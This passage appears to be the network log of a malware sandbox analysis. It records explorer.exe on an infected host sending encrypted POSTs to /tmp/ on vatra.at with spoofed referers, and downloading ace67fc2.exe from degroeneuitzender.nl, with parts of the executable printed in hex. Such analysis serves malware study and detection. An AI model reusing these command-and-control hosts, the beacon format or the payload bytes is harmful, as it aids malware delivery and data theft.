                                                          Jan 3, 2023 09:46:30.477214098 CET142OUTData Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 6e 43 c5 9f
                                                          Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA -[k,vunC7\dGl!sK5' fb7QD?=8:Fv7,S1\}UIqwkx0d33aSKYGz
                                                          Jan 3, 2023 09:46:31.671641111 CET142INHTTP/1.0 404 Not Found
                                                          Date: Tue, 03 Jan 2023 08:46:31 GMT
                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                          X-Powered-By: PHP/5.6.40
                                                          Content-Length: 43
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 53 3b 08 a6 69 5f b5 aa 13 a5 d0 ba f3 6d 87 21 c7 f7 30 14 10 94 8f
                                                          Data Ascii: #\(S;i_m!0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          4192.168.2.549713211.171.233.12680C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 3, 2023 09:46:53.185036898 CET152OUTPOST /tmp/ HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://bvgxojnl.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 293
                                                          Host: vatra.at
                                                          Jan 3, 2023 09:46:53.185298920 CET152OUTData Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 5b 5a c0 85
                                                          Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA -[k,vu[ZM5DL2NfFV-d@.|slUU<E;u`\}%Pu=2d?E].bHbEONv[-F,
                                                          Jan 3, 2023 09:46:54.494102955 CET152INHTTP/1.0 404 Not Found
                                                          Date: Tue, 03 Jan 2023 08:46:53 GMT
                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                          X-Powered-By: PHP/5.6.40
                                                          Content-Length: 58
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0f 6f 41 e6 37 0f f5 fd 52 fa 8a f8 af 2c 90 2b c7 b6 2d 56 5a 9f 93 9c da 61 d9 2d 5a 1a 91 06 8f 41 28 43 5c ad
                                                          Data Ascii: #\6oA7R,+-VZa-ZA(C\


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          5192.168.2.54971593.112.238.8580C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 3, 2023 09:46:55.877154112 CET818OUTPOST /tmp/ HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://eaybestph.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 157
                                                          Host: vatra.at
                                                          Jan 3, 2023 09:46:55.879159927 CET818OUTData Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 08 6b 2c 90 f4 76 0b 75 48 2c ad 90
                                                          Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA ,[k,vuH,hg-)A{woEhg?^A3KJ<9D~c\.
                                                          Jan 3, 2023 09:46:56.320611954 CET819INHTTP/1.0 404 Not Found
                                                          Date: Tue, 03 Jan 2023 08:46:56 GMT
                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                          X-Powered-By: PHP/5.6.40
                                                          Content-Length: 331
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          6192.168.2.549716195.158.3.16280C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 3, 2023 09:46:56.466929913 CET820OUTPOST /tmp/ HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ywmrapro.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 327
                                                          Host: vatra.at
                                                          Jan 3, 2023 09:46:56.467057943 CET820OUTData Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 30 33 db fa
                                                          Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA -[k,vu03mLwzw4X565r9u;7xv!:IhqA=;u|:);`"Cwt +[9f"lrCy`sQ*Ek
                                                          Jan 3, 2023 09:46:57.028589010 CET821INHTTP/1.0 404 Not Found
                                                          Date: Tue, 03 Jan 2023 08:46:56 GMT
                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                          X-Powered-By: PHP/5.6.40
                                                          Content-Length: 331
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          7192.168.2.54971758.235.189.19280C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 3, 2023 09:46:57.365504026 CET822OUTPOST /tmp/ HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://bmjduhjgq.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 265
                                                          Host: vatra.at
                                                          Jan 3, 2023 09:46:57.365545034 CET822OUTData Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 3f 02 c2 95
                                                          Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA -[k,vu?H[LDx[|Er4U<t!B#N+<[AbYB]nYxVW_92ZpC%C\,Ucg=B
                                                          Jan 3, 2023 09:46:58.582076073 CET830INHTTP/1.0 404 Not Found
                                                          Date: Tue, 03 Jan 2023 08:46:57 GMT
                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                          X-Powered-By: PHP/5.6.40
                                                          Content-Length: 331
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          8192.168.2.549719175.120.254.980C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 3, 2023 09:46:58.922198057 CET831OUTPOST /tmp/ HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://bagetn.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 118
                                                          Host: vatra.at
                                                          Jan 3, 2023 09:46:58.922215939 CET831OUTData Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 44 41 c4 f8
                                                          Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA -[k,vuDATiv\`|'k"/fN[
                                                          Jan 3, 2023 09:46:59.847616911 CET832INHTTP/1.0 404 Not Found
                                                          Date: Tue, 03 Jan 2023 08:46:59 GMT
                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                          X-Powered-By: PHP/5.6.40
                                                          Content-Length: 331
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          9192.168.2.549720211.171.233.12680C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 3, 2023 09:47:00.357947111 CET833OUTPOST /tmp/ HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://bdiba.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 349
                                                          Host: vatra.at
                                                          Jan 3, 2023 09:47:00.357969046 CET833OUTData Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 66 30 d3 eb
                                                          Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA -[k,vuf0rp/d-`d~9>Ie?K.o_J0=s7d&_6dbR8SP~jSG"qdCG1D+
                                                          Jan 3, 2023 09:47:01.673994064 CET834INHTTP/1.0 404 Not Found
                                                          Date: Tue, 03 Jan 2023 08:47:00 GMT
                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                          X-Powered-By: PHP/5.6.40
                                                          Content-Length: 331
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.5497145.135.247.111443C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2023-01-03 08:46:54 UTC0OUTGET /systems/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Host: degroeneuitzender.nl
                                                          2023-01-03 08:46:54 UTC0INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Jan 2023 08:46:54 GMT
                                                          Server: Apache
                                                          Content-Description: File Transfer
                                                          Content-Disposition: attachment; filename=ace67fc2.exe
                                                          Content-Transfer-Encoding: binary
                                                          Expires: 0
                                                          Cache-Control: must-revalidate
                                                          Pragma: public
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          Content-Type: application/octet-stream
                                                          2023-01-03 08:46:54 UTC0INData Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 12 00 3d e2 73 6e 6e e2 73 6e 6e e2 73 6e 6e fc 21 ea 6e c6 73 6e 6e fc 21 fb 6e fb 73 6e 6e fc 21 ed 6e 95 73 6e 6e c5 b5 15 6e e7 73 6e 6e e2 73 6f 6e 8d 73 6e 6e fc 21 e4 6e e3 73 6e 6e fc 21 fa 6e e3 73 6e 6e fc 21 ff 6e e3 73 6e 6e 52 69 63 68 e2 73 6e 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 66
                                                          Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$=snnsnnsnn!nsnn!nsnn!nsnnnsnnsonsnn!nsnn!nsnn!nsnnRichsnnPELf
                                                          2023-01-03 08:46:54 UTC8INData Raw: 83 01 00 75 20 8d 45 fc 50 8d 85 fc f7 ff ff 50 ff 15 14 10 40 00 56 ff 15 18 10 40 00 56 56 ff 15 24 10 40 00 4f 75 d1 68 ac 25 40 00 ff 15 28 10 40 00 e8 9b fe ff ff 5f 5e c9 c3 81 ec 54 01 00 00 56 33 f6 83 3d 04 99 47 00 20 57 75 4a 56 ff 15 5c 11 40 00 56 ff 15 1c 10 40 00 56 ff 15 10 10 40 00 56 ff 15 48 10 40 00 56 56 ff 15 08 10 40 00 56 56 ff 15 14 10 40 00 56 56 e8 32 0e 00 00 56 56 e8 2b 0e 00 00 59 59 89 74 24 04 89 34 24 e8 69 fb ff ff dd d8 33 ff 56 56 ff 15 5c 10 40 00 56 ff 15 3c 10 40 00 56 56 56 56 ff 15 2c 10 40 00 81 ff de 81 24 00 0f 8d 93 0d 00 00 c7 84 24 58 01 00 00 ba 25 35 20 c7 84 24 b8 00 00 00 11 23 67 29 c7 44 24 54 2f 7e c1 16 c7 84 24 cc 00 00 00 6c d4 37 4b c7 44 24 1c 19 54 be 71 c7 44 24 3c 67 23 6f 2a c7 84 24 2c 01 00
                                                          Data Ascii: u EPP@V@VV$@Ouh%@(@_^TV3=G WuJV\@V@V@VH@VV@VV@VV2VV+YYt$4$i3VV\@V<@VVVV,@$$X%5 $#g)D$T/~$l7KD$TqD$<g#o*$,
                                                          2023-01-03 08:46:54 UTC8INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC8INData Raw: 32 30 30 30 0d 0a 24 b0 00 00 00 f4 2e d1 5e c7 84 24 a4 00 00 00 5a e4 f0 76 c7 84 24 e0 00 00 00 87 47 9e 2b c7 44 24 60 0a 87 71 68 c7 44 24 7c cb be b6 67 c7 84 24 3c 01 00 00 ef c4 3c 70 c7 44 24 64 c1 68 9d 3a c7 44 24 74 45 6a ea 5e c7 84 24 48 01 00 00 5b b1 99 69 c7 84 24 40 01 00 00 02 9c 30 2c c7 44 24 58 8f 6c ac 14 c7 84 24 44 01 00 00 2e 8d ee 7e c7 84 24 dc 00 00 00 36 0d 7f 54 c7 84 24 fc 00 00 00 f5 91 d2 70 c7 44 24 08 7d 56 9b 20 c7 84 24 10 01 00 00 55 14 da 16 c7 84 24 08 01 00 00 cc 44 e4 1a c7 44 24 30 8a 6c 51 41 c7 44 24 50 a4 95 a8 75 c7 84 24 a8 00 00 00 b7 1d 56 15 c7 44 24 5c c8 d9 30 37 c7 44 24 14 34 f6 dd 30 c7 84 24 e4 00 00 00 42 e5 92 78 c7 84 24 d8 00 00 00 84 05 17 5f c7 84 24 d0 00 00 00 ea e1 c4 33 c7 84 24 9c 00 00
                                                          Data Ascii: 2000$.^$Zv$G+D$`qhD$|g$<<pD$dh:D$tEj^$H[i$@0,D$Xl$D.~$6T$pD$}V $U$DD$0lQAD$Pu$VD$\07D$40$Bx$_$3$
                                                          2023-01-03 08:46:54 UTC16INData Raw: c3 dd d8 dd d8 d9
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC16INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC16INData Raw: 32 30 30 30 0d 0a e8 c3 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 08 c6 85 70 ff ff ff 07 c3 c6 85 70 ff ff ff 01 dc 05 c4 14 41 00 c3 d9 c9 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff ff 07 eb 07 c6 85 70 ff ff ff 01 de c1 c3 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 20 d9 c9 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff ff 07 eb 07 c6 85 70 ff ff ff 01 de c1 c3 dd d8 dd d8 db 2d b0 14 41 00 80 bd 70 ff ff ff 00 7f 07 c6 85 70 ff ff ff 01 0a c9 c3 0a c9 74 02 d9 e0 c3 cc cc cc cc cc cc db 6c 24 10 db 6c 24 04 8b 44 24 08 03 c0 0f 83 86 00 00 00 35 00 00 00 0e a9 00 00 00 0e 74 03 de f9 c3 c1 e8 1c 80 b8 e0 14 41 00 00 75 03 de f9 c3 8b 44 24 0c 25 ff 7f
                                                          Data Ascii: 2000bbi@tppAbbi@tppbbi@t bbi@tpp-Apptl$l$D$5tAuD$%
                                                          2023-01-03 08:46:54 UTC24INData Raw: 39 75 04 8b c1 eb
                                                          Data Ascii: 9u
                                                          2023-01-03 08:46:54 UTC24INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC24INData Raw: 32 30 30 30 0d 0a 02 33 c0 85 c0 74 0a 8b 58 08 89 5d fc 85 db 75 07 33 c0 e9 fb 00 00 00 83 fb 05 75 0c 83 60 08 00 33 c0 40 e9 ea 00 00 00 83 fb 01 0f 84 de 00 00 00 8b 4e 60 89 4d f8 8b 4d 0c 89 4e 60 8b 48 04 83 f9 08 0f 85 b8 00 00 00 8b 0d 50 18 41 00 8b 3d 54 18 41 00 8b d1 03 f9 3b d7 7d 24 6b c9 0c 8b 7e 5c 83 64 39 08 00 8b 3d 50 18 41 00 8b 1d 54 18 41 00 42 03 df 83 c1 0c 3b d3 7c e2 8b 5d fc 8b 00 8b 7e 64 3d 8e 00 00 c0 75 09 c7 46 64 83 00 00 00 eb 5e 3d 90 00 00 c0 75 09 c7 46 64 81 00 00 00 eb 4e 3d 91 00 00 c0 75 09 c7 46 64 84 00 00 00 eb 3e 3d 93 00 00 c0 75 09 c7 46 64 85 00 00 00 eb 2e 3d 8d 00 00 c0 75 09 c7 46 64 82 00 00 00 eb 1e 3d 8f 00 00 c0 75 09 c7 46 64 86 00 00 00 eb 0e 3d 92 00 00 c0 75 07 c7 46 64 8a 00 00 00 ff 76 64 6a
                                                          Data Ascii: 20003tX]u3u`3@N`MMN`HPA=TA;}$k~\d9=PATAB;|]~d=uFd^=uFdN=uFd>=uFd.=uFd=uFd=uFdvdj
                                                          2023-01-03 08:46:54 UTC32INData Raw: 20 41 00 74 68 8b
                                                          Data Ascii: Ath
                                                          2023-01-03 08:46:54 UTC32INData Raw: 0d 0a
                                                          Data Ascii:
